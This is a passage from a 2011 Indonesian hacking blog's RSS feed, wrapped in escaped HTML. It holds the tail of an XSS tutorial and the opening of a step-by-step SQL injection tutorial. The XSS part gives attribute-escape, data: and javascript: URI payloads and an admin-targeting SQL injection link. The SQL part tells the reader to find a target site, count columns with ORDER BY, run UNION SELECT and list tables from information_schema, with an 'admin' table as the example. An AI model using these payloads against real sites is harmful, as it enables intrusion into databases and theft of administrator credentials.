Code:&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;style=’display:block;width:99999px;height:99999px;’&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Sebuah eventhandler yang dapat kita gunakan dalam kasus ini bisa onmouseover, onblur meskipun mungkin lebih baik.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Anda mungkin bertanya pada diri sendiri, mengapa script di atas tidak aman? Karena htmlentities () digunakan dengan cara yang tidak aman, karena&lt;br /&gt;
bahwa tag terlihat seperti ini dalam bentuk html: &amp;lt;input type=’radio’ value=’flag’ checked=’$var’ /&amp;gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Di dalam nilai memeriksa variabel kami ($ var) dikodekan, tetapi hanya “&amp;gt; dan &amp;lt;yang disandikan, bukan ‘karena ENT_QUOTES&lt;br /&gt;
tidak diatur dalam fungsi htmlentities. Ini berarti bahwa kita dapat melepaskan diri dari checked =”dengan mudah.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Contoh serangan bisa URL: http://was-secure.tld/search.php?test = ‘style =’ display: block; width: 99999px; height: 99999px; ‘onmouseover =’ alert (0)&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Tidak ada “Contoh Kasus – C” karena saya telah melalui sebagian besar penting Cross Site Scripting.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;___ -:: Tambahan Informasi:: – ____________&lt;br /&gt;
XSSR&lt;br /&gt;
Ketika itu adalah mungkin untuk mengirim pengguna ke data atau skema URI javascript baik melalui A) GET atau POST-variabel atau B) Pengguna&lt;br /&gt;
disampaikan konten seperti link maka berlaku untuk kategori XSSR bug. Namun beberapa individu telah menyatakan bahwa&lt;br /&gt;
situs yang hanya menerima HTTP atau HTTPS GET-link melalui variabel juga jatuh di bawah kategori XSSR.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Sebuah contoh dapat XSSR: http://somesite.tld/redirect.php?link=data:text/html, &amp;lt;script&amp;gt; alert (0) &amp;lt;/ script&amp;gt;&lt;br /&gt;
Dan jika skema URI Javascript digunakan: http://somesite.tld/redirect.php?link=javascript:alert (0);&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Hal ini dalam beberapa kasus telah diketahui bocor cookie dan karena itu digunakan dalam sesi-pembajakan.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;XSSQLI&lt;br /&gt;
Ketika SQL Injection kerentanan ada dalam daerah istimewa situs target, XSSQLI menjadi berguna.&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;Contoh dapat menipu XSSQLI administrator “shouldbescure.tld” untuk mengklik baik SQL Injection&lt;br /&gt;
klik link atau Cross Site Scripting link yang berisi panggilan ke SQL Injection di daerah istimewa situs&lt;br /&gt;
tempat ini bisa menjadi rentan bagian: http://shouldbesecure.tld/admin.php?del=1 DAN 1 = 1 / *&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;XSRF&lt;br /&gt;
Juga dikenal sebagai CSRF dan C-Surf dapat digunakan untuk melawan situs yang tidak menggunakan token yang biasanya tersembunyi di dalam tag.&lt;br /&gt;
Sebuah cara yang umum untuk menggunakan token terhadap C-Surf serangan adalah untuk menyembunyikan mereka di dalam tag seperti:&lt;br /&gt;
Code:&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&amp;lt;input type=”hidden” name=”anti-csrf” value=”random token value” /&amp;gt;&lt;/div&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3900780076543133178-1829058035783846654?l=sxcode.blogspot.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=H1a1F0lx68A:n3VpmU5OVNM:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=H1a1F0lx68A:n3VpmU5OVNM:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?i=H1a1F0lx68A:n3VpmU5OVNM:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=H1a1F0lx68A:n3VpmU5OVNM:dnMXMwOfBR0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=dnMXMwOfBR0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=H1a1F0lx68A:n3VpmU5OVNM:YwkR-u9nhCs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=YwkR-u9nhCs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=H1a1F0lx68A:n3VpmU5OVNM:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?i=H1a1F0lx68A:n3VpmU5OVNM:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=H1a1F0lx68A:n3VpmU5OVNM:7Q72WNTAKBA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=7Q72WNTAKBA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=H1a1F0lx68A:n3VpmU5OVNM:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?i=H1a1F0lx68A:n3VpmU5OVNM:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=H1a1F0lx68A:n3VpmU5OVNM:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=H1a1F0lx68A:n3VpmU5OVNM:KwTdNBX3Jqk"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?i=H1a1F0lx68A:n3VpmU5OVNM:KwTdNBX3Jqk" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=H1a1F0lx68A:n3VpmU5OVNM:l6gmwiTKsz0"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=l6gmwiTKsz0" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=H1a1F0lx68A:n3VpmU5OVNM:TzevzKxY174"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?d=TzevzKxY174" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/SecurityBlog?a=H1a1F0lx68A:n3VpmU5OVNM:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/SecurityBlog?i=H1a1F0lx68A:n3VpmU5OVNM:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/SecurityBlog/~4/H1a1F0lx68A" height="1" width="1"/&gt;</description><app:edited xmlns:app="http://www.w3.org/2007/app">2011-07-27T01:09:54.307-07:00</app:edited><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total><feedburner:origLink>http://sxcode.blogspot.com/2011/07/tutorial-xss-injection.html</feedburner:origLink></item><item><title>Tutorial SQL Injection Step By Step</title><link>http://feedproxy.google.com/~r/SecurityBlog/~3/Ab2m5o0sQtc/tutorial-sql-injection-step-by-step.html</link><category>Tips - Triks</category><author>noreply@blogger.com (Bajingan)</author><pubDate>Wed, 27 Jul 2011 01:04:37 PDT</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-3900780076543133178.post-456229933333975340</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;&lt;span class="Apple-style-span" style="font-family: Tahoma, Verdana, Arial, sans-serif; font-size: 12px; line-height: 21px;"&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;Pengertian sql injection:&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi clien dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;Yang perlu di ketahui sebelum sql injection pada mysql:&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;karakter: ‘ atau -&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;comments: /* atau –&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;===========&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;=step Satu:=&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;===========&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;carilah target&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;misal: [site]/berita.php?id=100&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;contoh:&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;[site]/berita.php?id=100′ atau&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;[site]/berita.php?id=-100&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;ehingga muncul pesan error seperti berikut (masih bnyak lagi):&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;==========&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;=step Dua:=&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;==========&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;mencari dan menghitung jumlah table yang ada dalam databasenya…&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;gunakan perintah : order by&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;contoh:&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;[site]/berita.php?id=-100+order+by+1– atau&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;[site]/berita.php?id=-100+order+by+1/*&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;ceklah secara step by step (satupersatu)…&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;misal:&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;[site]/berita.php?id=-100+order+by+1–&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;[site]/berita.php?id=-100+order+by+2–&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;[site]/berita.php?id=-100+order+by+3–&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;[site]/berita.php?id=-100+order+by+4–&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;sehingga muncul error atau hilang pesan error…&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;misal: [site]/berita.php?id=-100+order+by+9–&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;berarti yang kita ambil adalah sampai angka 8&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;menjadi [site]/berita.php?id=-100+order+by+8–&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;===========&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;=step Tiga:=&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;===========&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;untuk mengeluarkan angka berapa yang muncul gunakan perintah union&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;karena tadi error sampai angka 9&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8–&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;ok seumpama yg keluar angka 5&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadi&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;misal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8– atau&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8–&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah From+Information_schema..&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;============&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;=step Empat:=&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;============&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;untuk menampilkan table yg ada pada web tsb adalah&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;perintah table_name &amp;gt;&amp;gt;&amp;gt; dimasukan pada angka yg keluar tadi&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="color: white;"&gt;perintah +from+information_schema.tables/* &amp;gt;&amp;gt;&amp;gt; dimasukan setelah angka terakhir&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;Code:&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+inf ormation_schema.tables–&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;seumpama table yang muncul adalah “admin”&lt;/span&gt;&lt;/div&gt;&lt;div style="border-bottom-width: 0px; border-color: initial; border-left-width: 0px; border-right-width: 0px; border-style: initial; border-top-width: 0px; font-family: inherit; font-size: 12px; font-style: inherit; font-weight: inherit; margin-bottom: 1.8em; margin-left: 0px; margin-right: 0px; margin-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; padding-top: 0px; vertical-align: baseline;"&gt;&lt;span class="Apple-style-span" style="color: white;"&gt;===========&lt;/span&gt;&lt;br /&gt;
